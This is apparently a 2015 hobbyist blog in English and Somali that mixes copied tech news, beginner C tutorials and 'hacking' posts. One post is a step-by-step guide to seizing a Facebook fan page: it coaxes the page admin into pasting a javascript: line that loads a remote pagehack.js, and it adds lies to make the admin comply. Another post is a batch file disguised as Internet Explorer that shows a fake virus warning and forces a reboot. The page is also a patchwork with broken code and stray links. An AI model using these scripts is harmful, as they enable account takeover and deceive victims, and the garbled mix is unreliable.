hack whats up massege

Sunday, May 24, 2015


A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported ‘ The Hacker News’. Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst. In a video demonstration, they showed that how a 2000 words (2kb in size) message in special character set can crash Whatsapp messenger app. Previous it was discovered that sending a huge message ( greater than 7mb in size) on Whatsapp could crash victim device and app immediately, but using this new exploit attacker only need to send a very small size (approx 2kb) message to the victim. The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely. "What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal ," Bhuyan told THN in an e- mail. According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions. Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don’t want someone to keep records of my chat with them, then I can also send the same message exploit to the person. The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1. They have also provided the Proof-of- Concept (PoC) video for the attack, users can watch above. WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million. WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the "largest deployment of end-to-end encryption ever.

Google to Introduce New Photo-Sharing Platform to Kill Instagram


Google is reportedly going to launch a new online photo-sharing service and storage option at its developer conference later this month, which Bloomberg says, will not be a part of its Google+ social network. At the moment, Google offers a photo sharing service known as "Google+ Photos," which comes pre-installed with every Android device. Google+ Photos automatically backs up photos in the device to Google cloud storage. However, the new photo service will not be a part of Google+ network . It seems like the company’s attempts to bolster its product lineup and compete with the increasingly popular rivals like Facebook or Twitter to grow its user base. Just the way like Facebook, who acquired the popular mobile photo-sharing service Instagram in 2012 and increased its user base to more than 300 Million users in one shot. There aren’t many details about How the new Google photo service will work? Whether the online photo storage part of the service will be free? Or... Whether the search engine will charge you to store large chunks of photos on the new tool? However, the source says that the new photo sharing tool, earlier rumored as Google Photos spinoff, will allow users to share their images with other social networking sites such as Facebook and Twitter. We’ll soon have more details on Google’s new photos service as the search engine giant is most likely to unveil its independent photo sharing service at Google I/O annual software developers’ conference in San Francisco at the end of the month. Apart from the new photo service, Google is also expected to unveil some new features. Android for Work, a new Android OS called Android M for now, and new voice commands to access Android devices are among them.Hdetwt

Facebook Password Hacking : How To Hack Admin Facebook Fan Page :D

Saturday, May 23, 2015

Hello fans! Many of my site visitors asked me about how to hack Facebook fan page. As Facebook Fan Page is an excellent platform for communication and for spreading our bussiness in world, as a reason if which it has become the number one target of hackers.

Today in this article I am going to explain you how to hack Facebook fan page using javascript. As we all know its difficult to hack Facebook fan page but using this method you can hack Facebook fan page easily.

 Hack Facebook Fan Admin Page

Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page

Step 1: First download Facebook page hacking exploit.

Password : www.wildhacker.com

Step 2: Now open the pagehack.js [in package] with notepad and search for nk@wildhacker.com and change nk@wildhacker.com with your facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.

Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this,

www.yoursite.com/pagehack.js

Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack:

javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.

Tip: Tell him that it will make your page safe, or something else like attracting.

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.

Thats it..

I hope you will be able to hack any Facebook fan page after reading this post.please do comment share and like this post if the information below is helpful to you.

Enjoy hacking..........

ACCI CODE LETTERS A>>>>>>Z

#include<stdio.h>
#include<conio.h>
 void main ()
 {
     char ch='a';
     while(ch!='\r')
     {
         printf("Enter the letter you

want:\n");
         ch=getch();
         printf("%d\n");
         printf("\The Chracter you

enter%c Is %d. \n" ,ch,ch);
     }
     getch();
    
    
    
 }
If you get error let us know comment in the below section Thanks

C Programming Arrays

Sunday, May 10, 2015

In C programming, one of the frequently arising problem is to handle similar types of data. For example: If the user want to store marks of 100 students. This can be done by creating 100 variable individually but, this process is rather tedious and impracticable. These type of problem can be handled in C programming using arrays.
An array is a sequence of data item of homogeneous value(same type).
Arrays are of two types:
  1. One-dimensional arrays
  2. Multidimensional arrays( will be discussed in next chapter )

Function declarator


Function declarator is the first line of function definition. When a function is called, control of the program is transferred to function declarator.

Syntax of function declarator

return_type function_name(type(1) argument(1),....,type(n) argument(n))
Syntax of function declaration and declarator are almost same except, there is no semicolon at the end of declarator and function declarator is followed by function body.
In above example, int add(int a,int b) in line 12 is a function declarator.

 Function body

Function declarator is followed by body of function inside braces.

Passing arguments to functions

In programming, argument(parameter) refers to data this is passed to function(function definition) while calling function.
In above example two variable, num1 and num2 are passed to function during function call and these arguments are accepted by arguments a and b in function definition.
Passing argument/parameter through function in C
Arguments that are passed in function call and arguments that are accepted in function definition should have same data type. For example:
If argument num1 was of int type and num2 was of float type then, argument variable a should be of type int and b should be of type float,i.e., type of argument during function call and function definition should be same.
A function can be called with or without an argument.

Return Statement

Return statement is used for returning a value from function definition to calling function.

Syntax of return statement

return (expression);     
For example:
return a;
return (a+b);
In above example, value of variable add in add() function is returned and that value is stored in variable sum in main() function. The data type of expression in return statement should also match the return type of function.

Example of user-defined function

/*Program to demonstrate the working of user defined function*/
#include <stdio.h>
int add(int a, int b);           //function prototype(declaration)
int main(){
     int num1,num2,sum;
     printf("Enters two number to add\n");
     scanf("%d %d",&num1,&num2);
     sum=add(num1,num2);         //function call 
     printf("sum=%d",sum); 
     return 0;
}
int add(int a,int b)            //function declarator
{             
/* Start of function definition. */
     int add;
     add=a+b;
     return add;                  //return statement of function 
/* End of function definition. */   
}                                  

Function prototype(declaration):

Every function in C programming should be declared before they are used. These type of declaration are also called function prototype. Function prototype gives compiler information about function name, type of arguments to be passed and return type.

Syntax of function prototype

return_type function_name(type(1) argument(1),....,type(n) argument(n));
In the above example,int add(int a, int b); is a function prototype which provides following information to the compiler:
  1. name of the function is add()
  2. return type of the function is int.
  3. two arguments of type int are passed to function.
Function prototype are not needed if user-definition function is written before main() function.

Function call

Control of the program cannot be transferred to user-defined function unless it is called invoked.

Syntax of function call

function_name(argument(1),....argument(n));
In the above example, function call is made using statement add(num1,num2); from main(). This make the control of program jump from that statement to function definition and executes the codes inside that function.

Function definition

Function definition contains programming codes to perform specific task.

Syntax of function definition

return_type function_name(type(1) argument(1),..,type(n) argument(n))
{
                //body of function
}
Function definition has two major components:


Advantages of user defined functions


  1. User defined functions helps to decompose the large program into small segments which makes programmer easy to understand, maintain and debug.
  2. If repeated code occurs in a program. Function can be used to include those codes and execute when needed by calling that function.
  3. Programmer working on large project can divide the workload by making different functions.

User defined function


C allows programmer to define their own function according to their requirement. These types of functions are known as user-defined functions. Suppose, a programmer wants to find factorial of a number and check whether it is prime or not in same program. Then, he/she can create two separate user-defined functions in that program: one for finding factorial and other for checking whether it is prime or not.

How user-defined function works in C Programming?

#include <stdio.h>
void function_name(){
................
................
}
int main(){
...........
...........
function_name();
...........
...........
}

C Programming Functions

In programming, a function is a segment that groups code to perform a specific task.
A C program has at least one function main( ). Without main() function, there is technically no C program.

Types of C functions

There are two types of functions in C programming:
  • Library function
  • User defined function

Library function

Library functions are the in-built function in C programming system. For example:
main()
- The execution of every C program starts from this main() function.
printf()
- prinf() is used for displaying output in C.
scanf()
- scanf() is used for taking input in C.
Visit this page to learn more about library functions in C programming language

C Programming if, if..else and Nested if...else Statement

The if, if...else and nested if...else statement are used to make one-time decisions in C Programming, that is, to execute some code/s and ignore some code/s depending upon the test expression.

C if Statement

if (test expression) {
       statement/s to be executed if test expression is true;
}
The if statement checks whether the text expression inside parenthesis () is true or not. If the test expression is true, statement/s inside the body of if statement is executed but if test is false, statement/s inside body of if is ignored.

Flowchart of if statement


Example 1: C if statement

Write a C program to print the number entered by user only if the number entered is negative.

#include <stdio.h>
      int main(){
      int num;
      printf("Enter a number to check.\n");
      scanf("%d",&num);
      if(num<0) {      /* checking whether number is less than 0 or not. */ 
            printf("Number = %d\n",num); 
      }  
/*If test condition is true, statement above will be executed, otherwise it will not be executed */
      printf("The if statement in C programming is easy.");
return 0;
}

Example of while loop Write a C program to find the factorial of a number, where the number is entered by user. (Hints: factorial of n = 1*2*3*...*n

/*C program to demonstrate the working of while loop*/
#include <stdio.h>
     int main(){
     int number,factorial;
     printf("Enter a number.\n");
     scanf("%d",&number);
     factorial=1;
     while (number>0){      /* while loop continues util test condition number>0 is true */
           factorial=factorial*number;
           --number;
}
printf("Factorial=%d",factorial);
return 0;
}
Output
Enter a number.
5
Factorial=120

for loop example Write a program to find the sum of first n natural numbers where n is entered by user. Note: 1,2,3... are called natural numbers.

#include <stdio.h>
int main(){
    int n, count, sum=0;
    printf("Enter the value of n.\n");
    scanf("%d",&n);
    for(count=1;count<=n;++count)  //for loop terminates if count>n
    {
        sum+=count;    /* this statement is equivalent to sum=sum+count */
    }
    printf("Sum=%d",sum);
    return 0;
}

Find the sum of two one-dimensional arrays using Dynamic Memory Allocation

#include <stdio.h>
#include <alloc.h>
#include <stdlib.h>
void main()
{
    int i,n;
    int *a,*b,*c;
    printf("How many Elements in each array...\n");
    scanf("%d", &n);
    a = (int *) malloc(n*sizeof(int));
    b = (int *) malloc(n*sizeof(int));
    c =( int *) malloc(n*sizeof(int));
    printf("Enter Elements of First List\n");
    for(i=0;i<n;i++)
    {
        scanf("%d",a+i);
    }
    printf("Enter Elements of Second List\n");
    for(i=0;i<n;i++)
    {
        scanf("%d",b+i);
    }
    for(i=0;i<n;i++)
    {
        *(c+i) = *(a+i) + *(b+i);
    }
    printf("Resultant List is\n");
    for(i=0;i<n;i++)
    {
        printf("%d\n",*(c+i));
    }
}

sidee loo isticmaala fifa 14 maneger mode part 2

Saturday, May 9, 2015

sideebaa loosameeyaa Antvirus(HOW TO CREATE ANTIVIRUS)

Raac tusaalayaasha so socda
koobi dheh code kan kadibna Notepad ka fur Bast dheh


    @echo off
    color cb
    title Batch Antivirus
    cls
    echo ===============
    echo [ Batch-Master]
    echo ===============
    echo If There's no message ,You are protected.
    set /p a=Enter a batch file to scan:
    for /f %%x in (
    'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
    ) do (
    if /i %%x equ %a%.bat (
    for /f %%z in (
    'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
    ) do (
    if /i %%z equ %a%.bat (
    cls
    echo Virus Detected!!
    del %a%.bat
    echo %a%.bat was deleted....
    pause >nul
    )
    )
    )
    )
    pause >nul

kadiba sva garee idigoo isticmaalaya extationka (.bat) tusaale Antivirus.bat
kadib fur  ama laba mar click sii muuska kheebtiisa bidix

how to create facebook fake virus

Friday, May 8, 2015


Sidee ba loo abuuraa facebook virus
Facebook virus waa virus sahlan samentisa iyo isticmaalkiisa
Hadaba hadi aad danen jirtay in aad saaxiibadaa facebook aad ka yaabisid adigoo istaamalaya Hab cusub
Virus waa virus sahlan mana waxyeelaayo facebook saaxiibkaa/saaxiibada computer kiisa/keeda
Waxaa aan u baahanahnay waa Notepad oo computer wali oo ku jira Opreting Systemka Microsoft Window
Marka hore soo fur Notepad
Copy ama ku qor Notepadka code kan hosku qoran
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5
MINUTES YOUR FACEBOOK ACCOUNT WILL BE
DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR
CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR
FACEBOOK ACCOUNT ARE NOW BEING
DELETED !!! PLEASE WAIT .........

Save garee Internet Explorer.bat waxaa waa jib ah in add isticmashid (.bat)
Right click ku kor dheh internet explorer.bat kadibna abuur shirt cut
Right click shortcut kadinba doro properts
Kadibna kasii dooro change icon kadib. Dooro sawirka internet explorer
Kadib delete file ki hore an samenay kadibna u dir sxbkaaga. Computerka sxbkaa 5 daqiiqo kadib waa oo is dami donaa
Comment & Share smile emoticon
this is fake virus 

  • Accessibility Options : access.cpl
  • Add Hardware : hdw

  • - See more at: file:///C:/Users/Yuuuf/Downloads/109%20Best%20Run%20Commands%20List%20~%20Hacking%20Tricks.htm#sthash.gpqGPGsa.dpuf


  • Accessibility Options : access.cpl
  • Add Hardware : hdw
  • - See more at: file:///C:/Users/Yuuuf/Downloads/109%20Best%20Run%20Commands%20List%20~%20Hacking%20Tricks.htm#sthash.gpqGPGsa.dpuf

  • Accessibility Options : access.cpl
  • Add Hardware : hdw
  • - See more at: file:///C:/Users/Yuuuf/Downloads/109%20Best%20Run%20Commands%20List%20~%20Hacking%20Tricks.htm#sthash.gpqGPGsa.dpuf